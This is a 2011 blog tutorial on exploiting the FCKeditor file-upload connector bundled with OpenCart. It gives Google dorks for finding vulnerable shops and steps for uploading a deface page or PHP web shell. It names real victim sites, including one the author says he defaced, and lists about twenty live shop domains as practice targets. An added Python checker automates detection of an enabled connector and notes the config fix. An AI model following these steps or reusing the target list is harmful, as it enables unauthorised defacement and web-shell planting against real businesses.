Tuesday, October 4, 2011

OpenCart FCKeditor Upload Vulnerability: Upload Your Deface Remotely



This method gets passed around under a "Wordpress" label, but the vulnerable component is the FCKeditor file-manager connector bundled with the OpenCart CMS (web shop), so it is also known as the OpenCart exploit. It's an old vulnerability, but many people still don't know about it, so I'm publishing a tutorial here.

1- Open Google.com and enter a dork:
inurl:admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
    or
    inurl:Powered By OpenCart


    You'll get a lot of websites from Google; pick any one. For example, I got this one:

    http://www.schoolshopper.com.au/

    Then simply append the vulnerable path to the site, for example:

    http://www.schoolshopper.com.au/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

    (The path may differ on other websites, e.g. examplesite.com/abc/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html)

    Now FCKeditor's connector test page will open.

    Look at the Connector option at the top left of the page and change the connector to PHP.

    Then use the file upload option to upload your deface page or shell.
    To check the shell or deface, open this URL:
      www.site.com/deface.html
      or
      www.site.com/shell.php
    I have uploaded jaguar.html there, so you can check http://www.schoolshopper.com.au/jaguar.html
    Mirror
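As an added example (not code from the original post), here is a small Python checker that automates the two manual steps above for a list of shop URLs: it confirms that FCKeditor's test.html is reachable under the path used in this post, then asks the PHP connector for a read-only folder listing to see whether the connector is enabled at all. The connector's query-string commands (Command=GetFolders&Type=File&CurrentFolder=/) and the `<Error number="1" />` reply for a disabled connector follow FCKeditor's own connector protocol, which this post does not spell out; the sample XML bodies below are constructed for offline testing, and example.com is a placeholder.

```python
"""Probe an OpenCart install for FCKeditor's exposed file-manager connector.

Added example, not code from the original post. It checks the two things the
tutorial relies on: that FCKeditor's test.html is reachable under
admin/view/javascript/fckeditor/editor/filemanager/connectors/ and that the
PHP connector answers. The classifier works on response bodies, so it can be
exercised offline with the constructed samples at the bottom.
"""
import re
import sys
import urllib.error
import urllib.request
from urllib.parse import urljoin

CONNECTOR_DIR = "admin/view/javascript/fckeditor/editor/filemanager/connectors/"
TEST_PAGE = CONNECTOR_DIR + "test.html"
# GetFolders is a read-only command of FCKeditor's connector protocol (assumption:
# taken from FCKeditor, the post itself never names the commands), so it is a
# safe way to learn whether the connector is enabled without uploading anything.
PHP_CONNECTOR = (CONNECTOR_DIR
                 + "php/connector.php?Command=GetFolders&Type=File&CurrentFolder=/")

_ERROR_RE = re.compile(r'<Error\s+number="(\d+)"')


def probe_urls(base):
    """Build the two probe URLs; keeps any path prefix (site.com/abc/) in base."""
    base = base if base.endswith("/") else base + "/"
    return {"test_page": urljoin(base, TEST_PAGE),
            "php_connector": urljoin(base, PHP_CONNECTOR)}


def classify_connector(status, body):
    """Return 'absent', 'disabled', 'enabled' or 'unknown' for a connector reply."""
    if status == 404:
        return "absent"
    if status != 200 or "<Connector" not in body:
        return "unknown"
    m = _ERROR_RE.search(body)
    if m is None or m.group(1) == "0":
        return "enabled"    # a folder listing came back: uploads are likely possible
    if m.group(1) == "1":
        return "disabled"   # FCKeditor's "this connector is disabled" error
    return "unknown"


def fetch(url, timeout=10):
    """Plain GET; returns (status, body). Network errors yield status 0."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, ""
    except (urllib.error.URLError, OSError):
        return 0, ""


def check_site(base, fetcher=fetch):
    """Run both probes against one site; fetcher is injectable for offline tests."""
    urls = probe_urls(base)
    status, _ = fetcher(urls["test_page"])
    result = {"test_page_exposed": status == 200}
    status, body = fetcher(urls["php_connector"])
    result["php_connector"] = classify_connector(status, body)
    return result


# Constructed sample replies, modelled on the connector's XML format.
SAMPLE_ENABLED = '''<?xml version="1.0" encoding="utf-8" ?>
<Connector command="GetFolders" resourceType="File">
<CurrentFolder path="/" url="/userfiles/file/" />
<Folders><Folder name="images" /></Folders>
</Connector>'''

SAMPLE_DISABLED = '''<?xml version="1.0" encoding="utf-8" ?>
<Connector command="GetFolders" resourceType="File">
<Error number="1" text="This connector is disabled. Please check the config.php file" />
</Connector>'''


if __name__ == "__main__":
    for site in sys.argv[1:]:
        print(site, check_site(site))
```

Run it as `python fck_probe.py http://shop.example/` against systems you are authorized to test. On the defensive side, FCKeditor's PHP connector ships disabled behind `$Config['Enabled'] = false;` in editor/filemanager/connectors/php/config.php (this comes from FCKeditor's own configuration, not from this post); an install that reports "enabled" here should set that back to false, and the test.html page has no business being reachable on a production shop.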


    Some demo sites for practice (some may have been patched by now; this is my old collection, so...)

    • http://ruthsgarden.com/
    • http://www.utahflowers.net/
    • http://www.eesnet.org/
    • http://bestonlinediscounts.net/
    • http://wenrestaurant.com/
    • http://www.inlove.my/
    • http://megamall.com.pk/
    • http://stefanyboutique.com/
    • http://www.virtualgeorge.info/
    • http://iphoneclone.biz/
    • http://amourcristallis.com/
    • http://www.schoolshopper.com.au/
    • http://www.mymaxi.nl/
    • http://wiretek.net/
    • http://shop.tjokgus.com/
    • http://www.aquariumsystem.it/
    • http://uae-shopper.com/
    • http://organicjewelries.com/
    • http://www.granmasantiques.com/
    • http://avocadogenie.com/
    • http://www.inputandanalysis.com/
    • http://eddiegifts.com/

    • devilscafe.in owner Minhal Mehdi
